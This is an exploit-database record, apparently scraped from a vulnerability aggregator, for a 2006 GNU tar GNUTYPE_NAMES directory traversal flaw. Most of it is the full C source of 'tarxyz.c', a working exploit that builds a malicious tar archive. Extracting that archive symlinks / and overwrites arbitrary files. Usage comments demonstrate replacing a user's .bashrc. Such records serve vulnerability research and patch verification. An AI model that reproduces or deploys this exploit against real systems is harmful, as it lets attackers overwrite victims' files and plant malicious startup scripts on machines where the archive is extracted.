Description
GNU Tar 1.1x - GNUTYPE_NAMES Directory Traversal
{"lastseen": "2020-04-01T19:04:17", "references": [], "description": "\nGNU Tar 1.1x - GNUTYPE_NAMES Directory Traversal", "edition": 1, "reporter": "Teemu Salmela", "exploitpack": {"type": "remote", "platform": "linux"}, "published": "2006-11-21T00:00:00", "title": "GNU Tar 1.1x - GNUTYPE_NAMES Directory Traversal", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.0, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-11-21T00:00:00", "id": "EXPLOITPACK:DF11AD35AE397D224F15C876C77D6BBC", "href": "", "viewCount": 3, "sourceData": "/*\nsource: https://www.securityfocus.com/bid/21235/info\n\nGNU Tar is prone to a vulnerability that may allow an attacker to place files and overwrite files in arbitrary locations on a vulnerable computer. These issues present themselves when the application processes malicious archives. \n\nA successful attack can allow the attacker to place potentially malicious files and overwrite files on a computer in the context of the user running the affected application. 
Successful exploits may aid in further attacks.\n*/\n\n/*\n * tarxyz.c - GNU tar directory traversal exploit.\n * Written by Teemu Salmela.\n *\n * Example usage (creates a tar file that extracts /home/teemu/.bashrc):\n * $ gcc -o tarxyz tarxyz.c\n * $ ./tarxyz > ~/xyz.tar\n * $ mkdir -p /tmp/xyz/home/teemu/\n * $ cp ~/newbashrc.txt /tmp/xyz/home/teemu/.bashrc\n * $ cd /tmp\n * $ tar -rf ~/xyz.tar xyz/home/teemu\n */\n\n#include <string.h>\n#include <stdio.h>\n#include <stdlib.h>\n\nstruct posix_header\n{ /* byte offset */\n char name[100]; /* 0 */\n char mode[8]; /* 100 */\n char uid[8]; /* 108 */\n char gid[8]; /* 116 */\n char size[12]; /* 124 */\n char mtime[12]; /* 136 */\n char chksum[8]; /* 148 */\n char typeflag; /* 156 */\n char linkname[100]; /* 157 */\n char magic[6]; /* 257 */\n char version[2]; /* 263 */\n char uname[32]; /* 265 */\n char gname[32]; /* 297 */\n char devmajor[8]; /* 329 */\n char devminor[8]; /* 337 */\n char prefix[155]; /* 345 */\n /* 500 */\n};\n\n#define GNUTYPE_NAMES 'N'\n\n#define BLOCKSIZE 512\n\nunion block\n{\n char buffer[BLOCKSIZE];\n struct posix_header header;\n};\n\nvoid data(void *p, size_t size)\n{\n size_t n = 0;\n char b[BLOCKSIZE];\n\n while (size - n > 512) {\n fwrite(&((char *)p)[n], 1, 512, stdout);\n n += 512;\n }\n if (size - n) {\n memset(b, 0, sizeof(b));\n memcpy(b, &((char *)p)[n], size - n);\n fwrite(b, 1, sizeof(b), stdout);\n }\n}\n\nint main(int argc, char *argv[])\n{\n char *link_name = \"xyz\";\n union block b;\n char *d;\n int i;\n unsigned int cksum;\n\n if (argc > 1)\n link_name = argv[1];\n\n if (asprintf(&d, \"Symlink / to %s\\n\", link_name) < 0) {\n fprintf(stderr, \"out of memory\\n\");\n exit(1);\n }\n memset(&b, 0, sizeof(b));\n strcpy(b.header.name, \"xyz\");\n strcpy(b.header.mode, \"0000777\");\n strcpy(b.header.uid, \"0000000\");\n strcpy(b.header.gid, \"0000000\");\n sprintf(b.header.size, \"%011o\", strlen(d));\n strcpy(b.header.mtime, \"00000000000\");\n strcpy(b.header.chksum, \" 
\");\n b.header.typeflag = GNUTYPE_NAMES;\n strcpy(b.header.magic, \"ustar \");\n strcpy(b.header.uname, \"root\");\n strcpy(b.header.gname, \"root\");\n for (cksum = 0, i = 0; i < sizeof(b); i++)\n cksum += b.buffer[i] & 0xff;\n sprintf(b.header.chksum, \"%06o \", cksum);\n fwrite(&b, 1, sizeof(b), stdout);\n data(d, strlen(d));\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645837945, "score": 1659818015}, "_internal": {"score_hash": "02efad87693cb363517ecec8498e4a7f"}}